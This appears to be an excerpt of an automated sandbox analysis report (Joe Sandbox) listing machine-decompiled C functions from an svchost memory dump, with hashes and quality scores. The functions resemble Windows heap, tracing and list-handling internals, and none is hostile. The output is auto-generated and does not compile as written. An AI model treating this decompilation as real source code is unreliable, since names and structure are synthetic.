                        						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                        						if(E03047D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						}
                        						_push(_t56);
                        						_push(_t47 - 0x20);
                        						_push(0x402);
                        						_push( *_t58 & 0x000000ff);
                        						E03069AE0();
                        						_t23 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                        					}
                        				}
                        				return _t23;
                        			}













                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a303ab308569d55a4fb53c3205d01b77761163489798764b9f7dbb88a76bb225
                        • Instruction ID: 3ca19e4b1b85843170bc9bbd571248fea1636bab4decc9c17f75d6fdf5d0ea5f
                        • Opcode Fuzzy Hash: a303ab308569d55a4fb53c3205d01b77761163489798764b9f7dbb88a76bb225
                        • Instruction Fuzzy Hash: 1F219CB5601A44ABC715DFA8D940E6AB7B8FF48700F084069F904CB790D735E910CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E030690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                        				intOrPtr* _v0;
                        				void* _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				char _v36;
                        				void* _t38;
                        				intOrPtr _t41;
                        				void* _t44;
                        				signed int _t45;
                        				intOrPtr* _t49;
                        				signed int _t57;
                        				signed int _t58;
                        				intOrPtr* _t59;
                        				void* _t62;
                        				void* _t63;
                        				void* _t65;
                        				void* _t66;
                        				signed int _t69;
                        				intOrPtr* _t70;
                        				void* _t71;
                        				intOrPtr* _t72;
                        				intOrPtr* _t73;
                        				char _t74;
                        
                        				_t65 = __edx;
                        				_t57 = _a4;
                        				_t32 = __ecx;
                        				_v8 = __edx;
                        				_t3 = _t32 + 0x14c; // 0x14c
                        				_t70 = _t3;
                        				_v16 = __ecx;
                        				_t72 =  *_t70;
                        				while(_t72 != _t70) {
                        					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                        						L24:
                        						_t72 =  *_t72;
                        						continue;
                        					}
                        					_t30 = _t72 + 0x10; // 0x10
                        					if(E0307D4F0(_t30, _t65, _t57) == _t57) {
                        						return 0xb7;
                        					}
                        					_t65 = _v8;
                        					goto L24;
                        				}
                        				_t61 = _t57;
                        				_push( &_v12);
                        				_t66 = 0x10;
                        				if(E0305E5E0(_t57, _t66) < 0) {
                        					return 0x216;
                        				}
                        				_t73 = L03044620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                        				if(_t73 == 0) {
                        					_t38 = 0xe;
                        					return _t38;
                        				}
                        				_t9 = _t73 + 0x10; // 0x10
                        				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                        				E0306F3E0(_t9, _v8, _t57);
                        				_t41 =  *_t70;
                        				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                        					_t62 = 3;
                        					asm("int 0x29");
                        					_push(_t62);
                        					_push(_t57);
                        					_push(_t73);
                        					_push(_t70);
                        					_t71 = _t62;
                        					_t74 = 0;
                        					_v36 = 0;
                        					_t63 = E0305A2F0(_t62, _t71, 1, 6,  &_v36);
                        					if(_t63 == 0) {
                        						L20:
                        						_t44 = 0x57;
                        						return _t44;
                        					}
                        					_t45 = _v12;
                        					_t58 = 0x1c;
                        					if(_t45 < _t58) {
                        						goto L20;
                        					}
                        					_t69 = _t45 / _t58;
                        					if(_t69 == 0) {
                        						L19:
                        						return 0xe8;
                        					}
                        					_t59 = _v0;
                        					do {
                        						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                        							goto L18;
                        						}
                        						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                        						 *_t59 = _t49;
                        						if( *_t49 != 0x53445352) {
                        							goto L18;
                        						}
                        						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                        						return 0;
                        						L18:
                        						_t63 = _t63 + 0x1c;
                        						_t74 = _t74 + 1;
                        					} while (_t74 < _t69);
                        					goto L19;
                        				}
                        				 *_t73 = _t41;
                        				 *((intOrPtr*)(_t73 + 4)) = _t70;
                        				 *((intOrPtr*)(_t41 + 4)) = _t73;
                        				 *_t70 = _t73;
                        				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                        				return 0;
                        			}



























                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction ID: 3e3b454d61be109499c40261d3212f186521ebbd3e800290e20894deb74b218c
                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction Fuzzy Hash: A6218E75A02704EFDB20DF99D844AAAF7F8EF44710F1488AAE949AB600D330ED00CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E03053B7A(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v20;
                        				intOrPtr _t17;
                        				intOrPtr _t26;
                        				void* _t35;
                        				void* _t38;
                        				void* _t41;
                        				intOrPtr _t44;
                        
                        				_t17 =  *0x31184c4; // 0x0
                        				_v12 = 1;
                        				_v8 =  *0x31184c0 * 0x4c;
                        				_t41 = __ecx;
                        				_t35 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x31184c0 * 0x4c);
                        				if(_t35 == 0) {
                        					_t44 = 0xc0000017;
                        				} else {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t35);
                        					_push(4);
                        					_push( &_v12);
                        					_push(0x6b);
                        					_t44 = E0306AA90();
                        					_v20 = _t44;
                        					if(_t44 >= 0) {
                        						E0306FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x31184c0 * 0xc);
                        						_t38 = _t35;
                        						if(_t35 < _v8 + _t35) {
                        							do {
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                        							} while (_t38 < _v8 + _t35);
                        							_t44 = _v20;
                        						}
                        					}
                        					_t26 =  *0x31184c4; // 0x0
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                        				}
                        				return _t44;
                        			}













                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61291026bbdbc42574a0b74beceed439294f89f7448287df6e5e7b94481caf39
                        • Instruction ID: 07f99ae326f23897d605f37dc2a12f8da4d894858666ba33cf95553cf9b731bc
                        • Opcode Fuzzy Hash: 61291026bbdbc42574a0b74beceed439294f89f7448287df6e5e7b94481caf39
                        • Instruction Fuzzy Hash: F821A4B2A01108AFD704DF58CE81F9ABBBDFB44748F1540A9F904AB251D771ED41DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E030A6CF0(void* __edx, intOrPtr _a4, short _a8) {
                        				char _v8;
                        				char _v12;
                        				char _v16;
                        				char _v20;
                        				char _v28;
                        				char _v36;
                        				char _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char* _t21;
                        				void* _t24;
                        				void* _t36;
                        				void* _t38;
                        				void* _t46;
                        
                        				_push(_t36);
                        				_t46 = __edx;
                        				_v12 = 0;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(E03047D50() == 0) {
                        					_t21 = 0x7ffe0384;
                        				} else {
                        					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                        				}
                        				if( *_t21 != 0) {
                        					_t21 =  *[fs:0x30];
                        					if((_t21[0x240] & 0x00000004) != 0) {
                        						if(E03047D50() == 0) {
                        							_t21 = 0x7ffe0385;
                        						} else {
                        							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t21 & 0x00000020) != 0) {
                        							_t56 = _t46;
                        							if(_t46 == 0) {
                        								_t46 = 0x3005c80;
                        							}
                        							_push(_t46);
                        							_push( &_v12);
                        							_t24 = E0305F6E0(_t36, 0, _t46, _t56);
                        							_push(_a4);
                        							_t38 = _t24;
                        							_push( &_v28);
                        							_t21 = E0305F6E0(_t38, 0, _t46, _t56);
                        							if(_t38 != 0) {
                        								if(_t21 != 0) {
                        									E030A7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                        									L03042400( &_v52);
                        								}
                        								_t21 = L03042400( &_v28);
                        							}
                        						}
                        					}
                        				}
                        				return _t21;
                        			}




















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0783bba4284fd5d5c9d74961f7b909eba96e1af635e381a840f61570427fe018
                        • Instruction ID: a83d17a8545a1591769148c7fa1f57d4751c66b9b4fbd64486db5b54494e2ca2
                        • Opcode Fuzzy Hash: 0783bba4284fd5d5c9d74961f7b909eba96e1af635e381a840f61570427fe018
                        • Instruction Fuzzy Hash: D221D372906B499BC311DFACD944BABB7FCEFC1680F0C0966B9509B250D735C608C6A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E030F070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				char _v8;
                        				intOrPtr _v11;
                        				signed int _v12;
                        				intOrPtr _v15;
                        				signed int _v16;
                        				intOrPtr _v28;
                        				void* __ebx;
                        				char* _t32;
                        				signed int* _t38;
                        				signed int _t60;
                        
                        				_t38 = __ecx;
                        				_v16 = __edx;
                        				_t60 = E030F07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                        				if(_t60 != 0) {
                        					_t7 = _t38 + 0x38; // 0x29cd5903
                        					_push( *_t7);
                        					_t9 = _t38 + 0x34; // 0x6adeeb00
                        					_push( *_t9);
                        					_v12 = _a8 << 0xc;
                        					_t11 = _t38 + 4; // 0x5de58b5b
                        					_push(0x4000);
                        					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                        					E030EAFDE( &_v8,  &_v12);
                        					E030F1293(_t38, _v28, _t60);
                        					if(E03047D50() == 0) {
                        						_t32 = 0x7ffe0380;
                        					} else {
                        						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						_t21 = _t38 + 0x3c; // 0xc3595e5f
                        						E030E14FB(_t38,  *_t21, _v11, _v15, 0xd);
                        					}
                        				}
                        				return  ~_t60;
                        			}














                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction ID: b20e68815cdb54766bb4add0ddf3860f186054d10b2294567e8eebc87376a72e
                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction Fuzzy Hash: F221D03A705300AFD715DF58C880AABBBE5EFC4650F088569FA958B792D630D909CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E030A7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t21;
                        				void* _t24;
                        				intOrPtr _t25;
                        				void* _t36;
                        				short _t39;
                        				signed char* _t42;
                        				unsigned int _t46;
                        				void* _t50;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t21 =  *0x3117b9c; // 0x0
                        				_t46 = _a8;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t4 = _t46 + 0x2e; // 0x2e
                        				_t36 = _t4;
                        				_t24 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                        				_t50 = _t24;
                        				if(_t50 != 0) {
                        					_t25 = _a4;
                        					if(_t25 == 5) {
                        						L3:
                        						_t39 = 0x14b1;
                        					} else {
                        						_t39 = 0x14b0;
                        						if(_t25 == 6) {
                        							goto L3;
                        						}
                        					}
                        					 *((short*)(_t50 + 6)) = _t39;
                        					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                        					_t11 = _t50 + 0x2c; // 0x2c
                        					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                        					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                        					E0306F3E0(_t11, _a12, _t46);
                        					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                        					if(E03047D50() == 0) {
                        						_t42 = 0x7ffe0384;
                        					} else {
                        						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t50);
                        					_t19 = _t36 - 0x20; // 0xe
                        					_push(0x403);
                        					_push( *_t42 & 0x000000ff);
                        					E03069AE0();
                        					_t24 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                        				}
                        				return _t24;
                        			}














                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10557f0fd505df26063ac33d8558c29116ee7388f41b2a111ec1ac4b7b4c55eb
                        • Instruction ID: 3bc7893e8e6097e0ec6046f31a7a61130d8ae7ff2ed48b832b3db6cfd3f2ec71
                        • Opcode Fuzzy Hash: 10557f0fd505df26063ac33d8558c29116ee7388f41b2a111ec1ac4b7b4c55eb
                        • Instruction Fuzzy Hash: 0E219F76501A04ABC725DFA9D880EABB7E9EF88B40F144569E50ACB750D734E900CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E0304AE73(intOrPtr __ecx, void* __edx) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				char* _t22;
                        				signed char* _t24;
                        				intOrPtr _t25;
                        				intOrPtr _t27;
                        				void* _t31;
                        				intOrPtr _t36;
                        				char* _t38;
                        				signed char* _t42;
                        
                        				_push(__ecx);
                        				_t31 = __edx;
                        				_v8 = __ecx;
                        				_t19 = E03047D50();
                        				_t38 = 0x7ffe0384;
                        				if(_t19 != 0) {
                        					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t22 = 0x7ffe0384;
                        				}
                        				_t42 = 0x7ffe0385;
                        				if( *_t22 != 0) {
                        					if(E03047D50() == 0) {
                        						_t24 = 0x7ffe0385;
                        					} else {
                        						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t24 & 0x00000010) != 0) {
                        						goto L17;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					_t27 = E03047D50();
                        					if(_t27 != 0) {
                        						_t27 =  *[fs:0x30];
                        						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                        					}
                        					if( *_t38 != 0) {
                        						_t27 =  *[fs:0x30];
                        						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						_t27 = E03047D50();
                        						if(_t27 != 0) {
                        							_t27 =  *[fs:0x30];
                        							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                        						}
                        						if(( *_t42 & 0x00000020) != 0) {
                        							L17:
                        							_t25 = _v8;
                        							_t36 = 0;
                        							if(_t25 != 0) {
                        								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                        							}
                        							_t27 = E030A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                        						}
                        						goto L5;
                        					} else {
                        						L5:
                        						return _t27;
                        					}
                        				}
                        			}














                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction ID: 850f8451ba8c0626bf494b47d1aeacd795ba4b26f9065c693fe7c5316aa5d87d
                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction Fuzzy Hash: 3521D4B1A07684AFEB15DB69C944B6677ECEF44640F0D08F1DD048B692D734DD40D6A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E0305FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				intOrPtr _t29;
                        				intOrPtr _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t40;
                        
                        				_t35 = __edx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t37 = 0;
                        				_v8 = __edx;
                        				_t29 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                        					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                        					L3:
                        					_t19 = _a4 - 4;
                        					if(_t19 != 0) {
                        						if(_t19 != 1) {
                        							L7:
                        							return _t37;
                        						}
                        						if(_t35 == 0) {
                        							L11:
                        							_t37 = 0xc000000d;
                        							goto L7;
                        						}
                        						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                        							_t35 = _v8;
                        						}
                        						 *((intOrPtr*)(_t40 + 4)) = _t35;
                        						goto L7;
                        					}
                        					if(_t29 == 0) {
                        						goto L11;
                        					}
                        					_t32 =  *_t40;
                        					if(_t32 != 0) {
                        						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                        						E030376E2( *_t40);
                        					}
                        					 *_t40 = _t29;
                        					goto L7;
                        				}
                        				_t40 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                        				if(_t40 == 0) {
                        					_t37 = 0xc0000017;
                        					goto L7;
                        				}
                        				_t35 = _v8;
                        				 *_t40 = 0;
                        				 *((intOrPtr*)(_t40 + 4)) = 0;
                        				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                        				goto L3;
                        			}











                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction ID: 651d6bf9442e2e744cdea7d90b9f91b14d89a0326eca2fbddeb3414fde4867dc
                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction Fuzzy Hash: E3218E76A42642DFD731CF09C640F67F7EAEB94A10F29857EE9468B610D7389D00DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E0305B390(void* __ecx, intOrPtr _a4) {
                        				signed int _v8;
                        				signed char _t12;
                        				signed int _t16;
                        				signed int _t21;
                        				void* _t28;
                        				signed int _t30;
                        				signed int _t36;
                        				signed int _t41;
                        
                        				_push(__ecx);
                        				_t41 = _a4 + 0xffffffb8;
                        				E03042280(_t12, 0x3118608);
                        				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                        				asm("sbb edi, edi");
                        				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                        				_v8 = _t36;
                        				asm("lock cmpxchg [ebx], ecx");
                        				_t30 = 1;
                        				if(1 != 1) {
                        					while(1) {
                        						_t21 = _t30 & 0x00000006;
                        						_t16 = _t30;
                        						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                        						asm("lock cmpxchg [edi], esi");
                        						if(_t16 == _t30) {
                        							break;
                        						}
                        						_t30 = _t16;
                        					}
                        					_t36 = _v8;
                        					if(_t21 == 2) {
                        						_t16 = E030600C2(0x3118608, 0, _t28);
                        					}
                        				}
                        				if(_t36 != 0) {
                        					_t16 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                        				}
                        				return _t16;
                        			}












                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4090e4ea31361c6421b258c96acdcfec22b33fd28a67d55d742a8c91ca95cda
                        • Instruction ID: 2e6faaf73028458bf11e38ed09d06362a7e07105cdd9357b1707ef550ca2a586
                        • Opcode Fuzzy Hash: b4090e4ea31361c6421b258c96acdcfec22b33fd28a67d55d742a8c91ca95cda
                        • Instruction Fuzzy Hash: 6A116F373171149FCB18DA148E4156F72AAEBC9770B28413DED16EB380CA316C02C694
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E03029240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t41;
                        				intOrPtr* _t46;
                        				void* _t48;
                        				intOrPtr _t50;
                        				intOrPtr* _t60;
                        				void* _t61;
                        				intOrPtr _t62;
                        				intOrPtr _t65;
                        				void* _t66;
                        				void* _t68;
                        
                        				_push(0xc);
                        				_push(0x30ff708);
                        				E0307D08C(__ebx, __edi, __esi);
                        				_t65 = __ecx;
                        				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                        				if( *(__ecx + 0x24) != 0) {
                        					_push( *(__ecx + 0x24));
                        					E030695D0();
                        					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                        				}
                        				L6();
                        				L6();
                        				_push( *((intOrPtr*)(_t65 + 0x28)));
                        				E030695D0();
                        				_t33 =  *0x31184c4; // 0x0
                        				L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                        				_t37 =  *0x31184c4; // 0x0
                        				L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                        				_t41 =  *0x31184c4; // 0x0
                        				E03042280(L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x31186b4);
                        				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                        				_t46 = _t65 + 0xe8;
                        				_t62 =  *_t46;
                        				_t60 =  *((intOrPtr*)(_t46 + 4));
                        				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                        					_t61 = 3;
                        					asm("int 0x29");
                        					_push(_t65);
                        					_t66 = _t61;
                        					_t23 = _t66 + 0x14; // 0x8df8084c
                        					_push( *_t23);
                        					E030695D0();
                        					_t24 = _t66 + 0x10; // 0x89e04d8b
                        					_push( *_t24);
                        					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                        					_t48 = E030695D0();
                        					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                        					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                        					return _t48;
                        				} else {
                        					 *_t60 = _t62;
                        					 *((intOrPtr*)(_t62 + 4)) = _t60;
                        					 *(_t68 - 4) = 0xfffffffe;
                        					E03029325();
                        					_t50 =  *0x31184c4; // 0x0
                        					return E0307D0D1(L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                        				}
                        			}















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6cfdb4296c525f8c404e22028bdee01bde5125c9ab60de2c41b22aeb11f2c381
                        • Instruction ID: a679f1695364b3c31b1b3e02101fbb64c194091ed3641695d53c59c7fe43ae12
                        • Opcode Fuzzy Hash: 6cfdb4296c525f8c404e22028bdee01bde5125c9ab60de2c41b22aeb11f2c381
                        • Instruction Fuzzy Hash: F1217F76542700DFC725EF28CA40F9AB7F9FF48704F0445A8E1098BAA1CB34E951DB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E030B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t18;
                        				intOrPtr _t24;
                        				intOrPtr* _t27;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				intOrPtr _t33;
                        				intOrPtr* _t34;
                        				intOrPtr* _t35;
                        				void* _t37;
                        				void* _t38;
                        				void* _t39;
                        				void* _t43;
                        
                        				_t39 = __eflags;
                        				_t35 = __edi;
                        				_push(8);
                        				_push(0x31008d0);
                        				E0307D08C(__ebx, __edi, __esi);
                        				_t37 = __ecx;
                        				E030B41E8(__ebx, __edi, __ecx, _t39);
                        				E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                        				_t18 = _t37 + 8;
                        				_t33 =  *_t18;
                        				_t27 =  *((intOrPtr*)(_t18 + 4));
                        				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                        					L8:
                        					_push(3);
                        					asm("int 0x29");
                        				} else {
                        					 *_t27 = _t33;
                        					 *((intOrPtr*)(_t33 + 4)) = _t27;
                        					_t35 = 0x31187e4;
